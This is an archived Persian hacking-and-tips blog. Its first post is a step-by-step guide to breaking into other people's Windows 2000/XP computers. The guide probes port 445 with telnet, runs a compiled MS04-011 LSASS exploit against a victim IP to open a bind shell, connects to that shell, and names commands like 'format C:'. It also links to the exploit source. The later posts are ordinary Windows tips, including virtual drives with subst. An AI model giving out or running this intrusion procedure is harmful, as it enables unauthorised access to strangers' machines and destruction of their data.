تابستان 1386 - هک - ترفند و کدهای جاوا

چهارشنبه 31 مرداد 86 ساعت 9:38 عصرهک بدون برنامه

بخونید و حال کنید

مطلبی که در اینجا میخوانید یکمی پیچیده است بنابراین اصلا نگران نباشید گام به گام با این متن پیش بروید سعی میکنم خیلی ساده عنوان کنم اصلا نگران نباشید
خلاصه کاری که ما میکنیم این است که ما با کارهای زیر میخواهیم به ویندوز 2000 یا ایکس پی حمله کنیم از بیرون دستگاه بدون اینکه به قربانی فایلی بدیم اجرا کنه یا هر ارتباط دیگری با قربانی داشته باشیم یعنی میخوایم خیلی حرفه ای نه مثل این هکر های تازه کار که تروجان میدن به مردم خیلی حرفه ای خودمان میخوایم یک پورت روی دستگاه قربانی باز کنیم بدون اینکه حتی یک کلمه هم با قربانی حرف بزنیم خوب حالا که فهمیدید چیکار میخوام بکنیم من یکبار دیگه هم خلاصه بگم یک ای پی انتخاب میکنید و بعد هکش میکنید اولین کاری که میکنیم این است که ای پی مورد نظر یا همان قربانی را برای باز بودن پورت 445 امتحان میکنیم
Start->run->CMD
را برای باز کردن یک صفحه کامند پرومت بزنید و بعد با دستور
telnet ip 445
امتحان میکنیم که ایا پورت 445 باز است یا نه البته شما اگر حرفه ای هستید حتما مثل هکر های حرفه ای برای این کارها یک برنامه خاص را استفاده میکنی بنا به سلیقه خودتان که از چه برنامه ای خوشتان میاد ولی در اینجا از دستوراتی استفاده میکنیم که هر کسی خواست این کار را انجام بدهد نیاز به برنامه خاصی نداشته باشه و با کمترین امکانات میخوایم به نتیجه برسیم
خوب توجه کنید به جا ای پی در دستور بالا باید ای پی قربانی را وارد کنید و اگر این دستور را وارد کردید و اتصال برقرار شد یعنی پورت 445 باز است پس گام اول را برداشتید و اگر اتصال برقرار نشد و پیغام خطا دریافت کردید قربانی شما به این نوع حمله نفوذ پذیر نیست
خوب حالا به گام دوم میرویم در زیر کد های حمله به این پورت را مشاهده میکنید این کدها را باید کامپایل بفرمائید و فایل اجرایی که بدست می اورید را بصورت زیر استفاده میکنید

expl <target> <victim IP> <bindport> [options]

در خط بالا طرز استفاده به این ترتیب است اولین کلمه expl نام فایل اجرایی است که بعد از کامپایل ایجاد کردید target یک عدد یک رقمی است که مقدار 0 برای ویندوز ایکس پی است و مقدار 1و2 برای ویندوز 2000 است در اخر این نوشته طرز تشخیص اینکه کدام عدد را استفاده کنید یعنی از کجا بفهمید قربانی ویندوز ایکس پی است که 0 بزنید یا قربانی ویندوز 2000 است که 1 یا 2 بزنید را میخوانید
victim ip همان ای پی قربانی شما است که پورت 445 ان باز بود
binport شماره پورتی است که میخواهید روی دستگاه قربانی برای شما باز بشود و به ان پورت وصل بشوید و قربانی را هک کنید
option یک دستور است که در ادامه تک دستور این برنامه را توضیح میدهم

خوب دوست من کار بسیار ساده است فرض کنید ای پی قربانی من 217.0.0.1 است و من طبق ان چیزهایی که بالا گفتم این کارهای را به تریتب انجام میدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله که قبلا کامپال کردم و الان اماده استفاده است استفاده میکنم
4- پنجره قبلی را که در 2 دستور قبل باز کردم میبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اینکه دستور خط 6 را زدنید این نوشته ها را مشاهده میکنید----
* [*] Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
* [*] Connecting to 217.0.0.1:445 ... OK
* [*] Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما که در خط شماره 6 من شماره پورت 24745 را انتخاب کردم الان باز شده تا ما وارد دستگاه قربانی بشویم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شدید دستگاه قربانی را هک کنید و این خطوط را مشاهده خواهید کرد
* Microsoft Windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در این جا شما هر دستوری بزنید روی دستگاه قربانی اجرا میشود مثل اگر بزنید format C: می توانید هارد قربانی را فرمت کنید
ولی توجه کنید یک هکر در اوج قدرت دست به خرابکاری نمیزنه !!! پس هر کاری خواستید بکنید ولی خرابکاری نه !!!

و اما چطوری تشخیص بدهید که دستگاه قربانی شما ویندوز 2000 است که از عدد 1 یا 2 استفاده کنید یا ویندوز ایکس پی هست که از عدد0 استفاده کنید ؟ شما کافی است که همان دستور بالا را که برای حمله استفاده مکنید بزنید و فقط به اخرش -t اضافه کنید یعنی اینطوری
expl 0 217.0.0.1 24745 -t
بعد از زدن این دستور برنامه به شما نسخه ویندوز را اعلام میکند اگر نسخه ویندوز را winnt 5.0اعلام کرد یعنی ویندوز 2000 است و شما عدد 1 یا 2 استفاده کنید و اگر winnt 5.1 را اعلام کرد ویندوز ایکس پی است

امیدوارم که مطلب بالا مورد استفاده شما قرار گرفته باشد توجه کنید برای اینکه همه بتوانند این مطلب را استفاده کنند مجبور شدم که خیلی جاها را ساده کنم ولی در سورس اصلی برنامه میتوانید به اصل دستور عمل ها پی ببرید .

برای دریافت کد برنامه به زبان سی اینجا کلیک کنید

ادرس : http://downloads.securityfocus.com/vulnerabilities/exploits/HOD-ms04011-lsasrv-expl.c

نظر بدی ما چاکریم

متن فوق توسط: مصطفی جعفری کیا نوشته شده است| نظرات دیگران ( نظر)

پنج شنبه 25 مرداد 86 ساعت 11:43 عصریه درخواست کوچیک

جون من نظر بدین مطالب توپی دارم براتون میزارم

متن فوق توسط: مصطفی جعفری کیا نوشته شده است| نظرات دیگران ( نظر)

دوشنبه 22 مرداد 86 ساعت 4:1 عصرمشاهده سایت های اینترنتی از طریق ماشین حساب ویندوز!

برای این کار
ابتدا به اینترنت وصل شوید.
برنامه Calculator را از طریق Start > All Programs > Accesroies اجرا کنید.
از منوی Help برنامه روی Help Topics کلیک کنید. خواهید دید پنجره جدیدی و مربوط به Help برنامه باز میشود.
اکنون از بالای پنجره ، سمت چپ ، محلی که عبارت Calclulator به چشم میخورد ، بر روی آیکون علامت سوال زرد کلیک کنید.
در داخل منو بر روی Jump to URL کلیک کنید. خواهید دید که پنجره کوچکی باز میشود.
اکنون کافی است در فیلد مخصوص Jump to this URL ، آدرس سایتی که میخواهید به آن وارد شوید مثلأ http://www.tarfandestan.com را وارد کنید و روی دکمه OK کلیک کنید.
حالا چند ثانیه صبر کنید تا پنجره سمت راست ، صفحه اینترنتی شما لود شود.
به این ترتیب شما یک مروگر مخفی در اختیار خواهید داشت.
لازم به ذکر است برای وارد کردن آدرس اینترنتی ، وارد نمودن //:http الزامی است.

نظر ندادن نرو ممنون

متن فوق توسط: مصطفی جعفری کیا نوشته شده است| نظرات دیگران ( نظر)

چهارشنبه 17 مرداد 86 ساعت 11:16 عصرچند ترفند ویندوزی

. اگر می خواهید مرورگرتان با آدرس مورد نظر شما اجرا شود و مستقیما به سایت دلخواه تان برود، فقط کافی است آدرس سایت را در منوی Run تایپ کرده و کلید Enter را بزنید. به طور مثال http://www.yahoo.com.

2. همه منوهای ویندوز، کلیدهای میانبر دارند که از ترکیب کلید Alt با یکی از حروف موجود در نام آن منو، ساخته شده است. در حالت عادی بازدن کلید Alt، این حروف میانبر، با یک زیر خط مشخص می شوند. به منظور نمایش دائمی این زیرخط ها، با کلیک راست روی میز کار و انتخاب گزینه Properties از منوی ظاهر شده، به زبانه Appearance بروید. در ادامه دکمه Effects را کلیک کرده و علامت گزینه Hide underline letters for keyboard navigation until press the [Alt] key را بردارید.

3. اگر می خواهید با زدن کلید Caps Lock، Num Lock یا Scroll Lock، صدایی از کامپیوترتان پخش شود، کنترل پنل را باز کرده، به قسمت Accessibility رفته و گزینه Togglekeys را فعال کنید.

4. در ویندوز XP، با نگه داشتن کلید Shift در پنجره Turn off computer، دکمه Standby به Hibernate تبدیل می شود. Hibernation یا خواب زمستانی، وضعیتی است که در آن، کامپیوتر قبل از خاموش شدن، محتویات حافظه را روی هارد دیسک ذخیره می کند و یا هنگام راه اندازی مجدد، ویندوز را با همان وضعیت قبلی بالا می آورد.

5. اگر ویژگی Hibernate روی ویندوز شما فعال نیست، برای فعال کردن آن، قسمت Power Options را از کنترل پنل باز کرده و به زبانه Hibernate بروید. اگر چنین زبانه ای وجود ندارد، دلیل آن، عدم پشتیبانی سخت افزار کامپیوترتان از این ویژگی است. در زبانه Hibernate گزینه Enable hibernation را فعال کرده و دکمه OK را کلیک کنید.

متن فوق توسط: مصطفی جعفری کیا نوشته شده است| نظرات دیگران ( نظر)

دوشنبه 18 تیر 86 ساعت 5:27 صبحساختن یک درایو مجازی بدون استفاده از نرم افزار

قبل از شروع عملیات لازم است ذکر کنم ایجاد چنین درایوهایی هیچ ربطی به پارتیشن بندی هارد دیسک ندارد و سلامت سیستم عامل شما را به خطر نخواهد انداخت. بنابراین نگران از دست رفتن اطلاعات خود نباشید. ضمنا اگر خوشتان نیامد راهی برای از بین بردن درایو مجازی وجود دارد. تا انتهای این مقاله با ما باشید.

برای ساخت درایو مجازی در این آموزش از فایل های خود ویندوز کمک می گیریم. اینبار به سراغ فایل اجرایی Subst.exe می رویم. این فایل در پوشه system32 که در پوشه windows قرار گرفته موجود است این فایل به همراه سیستم عامل داس ارائه شده و اجرای آن در حالت اولیه کار هیچ عکس العملی

نشان نخواهد داد. کلمه Subst برگرفته از کلمه Substitution به معنای جایگزینی و علی البدلی است و در حقیقت برای جانشین کرد یک دایرکتوری به یک درایو بکار می رود.

به این معنی که با اجرای این دستور می توانید محتویات یک فولدر خاص را به یک درایو تبدیل کنید و آن را در My Computer نشان دهید. گاهی اوقات گشتن به دنبال پوشه ایی در میان انبوه فایل ها و فولدرهای در یک درایو خاص وقت گیر است. این کار می تواند این امر را تسهیل بخشد.

مسلما عملیاتی مانند کپی و کات فایل ها یا حتی نصب برنامه ها در درایو هایی که به این روش ایجاد می شوند مقدور خواهد بود اما در مورد عملیات سیستمی مانند فرمت یا اسکن دیسک امکان پذیر نیست. حال چگونه از این Subst استفاده کنیم؟

به Run یا Command Prompt ویندوز وارد شوید ( توضیح: Run در خود منوی استارت ویندوز موجود است و همچنین برای ورود به Command Prompt در فیلد Run کلمه cmd را تایپ و اینتر کنید ) حال باید دستوری مطابق شکل زیر تایپ کنید (شکل کلی فرمان):

Subst NewDriveName: Folder Direction

فکر نکنم نیاز به توضیح چندانی باشه NewDriveName نام درایو جدیدی که قصد دارید ایجاد کنید. دقت کنید که این نام مشابه نام درایوهای موجود نباشه و Folder Direction مسیر پوشه ایی که قصد دارید اون رو به صورت درایو مجازی در بیارید. برای نمونه، مثال های زیر درایوهایی با نام K و L ایجاد خواهند کرد. درایو K جایگزینی برای محتویات پوشه C:part و درایو L جایگزینی برای مسیر C: Program FilesAdobe .

Subst K: C:part
Subst L: C: Program FilesAdobe

توجه! مدت دوام این درایو های مجازی بعد از ریستارت سیستم پایان می پذیرد و با یک بار ریستارت سیستم، دیگر این درایوها را نخواهید دید. برای جلوگیری از این امر چندین راه وجود دارد که بعلت کمی فرصت تنها یکی را شرح می دهیم.
در سیستم عامل های Dos و Win9x ساده ترین راه ویرایش فایل Autoexec.bat خواهد بود. این فایل را در درایو C بیابید و خطوط مربوط به Subst را در آن تایپ کنید تا در هر بار ریستارت سیستم به تبع آن Subst ایجاد شود. در سیستم عامل های xp و 2000 بهترین و راحترین کار این است که یک فایل اجرایی با پسوند .bat یا همان BatchFile ایجاد کنیم و خود فایل یا Shortcut آنرا در استارتاپ سیستم قرار دهیم.

یا می توانیم مسیر را در رجیستری ایجاد کنیم.

حال چگونه فایل اجرایی یا همان BatchFile را ایجاد کنیم. مسیر زیر را برای باز کردن یک صفحه notepad طی کنید:

Start All ProgramsAccessories otepad

از منوی فایل Save as را انتخاب و در مسیری دلخواه فایل را با پسوند bat ذخیره کنید. حال به سراغ فایلی که ایجاد کرده اید بروید. بر روی آن راست کلیک و Edit را برگزینید و دستورات مربوط به Subst را در آن تایپ و فایل را ذخیره کنید. حال نوبت به مسیردهی این فایل در رجیستری می رسد. به رجیستری وارد شوید( در فیلد Run کلمه Regedit را تایپ کنید). مسیر زیر را طی کنید:

HKEY_CURRENT_USERSOFTWARE
MicrosoftWindowsCurrent VersionRun

حال در بخش سمت راست محیط رجیستری راست کلیک کرده و پس از انتخاب گزینه New گزینه String Value را انتخاب سپس یک نام به ارزش ایجاد شده داده و با دابل کلیک بر روی آن در قسمت Value Date آدرس BatchFile را که در مرحله قبل ایجاد کرده اید، وارد کنید. بر روی ok کلیک و از رجیستری خارج شوید. اگر مراحل را درست طی کرده باشید این بار با ریستارت ویندوز درایوهای مجازی دوباره ایجاد خواهند شد.

حال اگر پشیمان شدید و قصد حذف درایو مجازی را داشتید طبق زیر عمل کنید:
پس از پاک کردن دستورات اضافه شده در فایل Autoexec.bat در سیستم عامل های Dos و Win9x و یا پاک کردن Shortcut یا خود فایل bat از استارتاپ سیستم و یا پاک کردن ارزش رشته در رجیستری برای سیتم عامل های xp و 2000 سیستم را یک بار دیگر ریستارت کنید. اگر هم بخواهید این کار را بدون ریستارت انجام دهید کافیست در Run یا Command Prompt دستور زیر را تایپ کنید: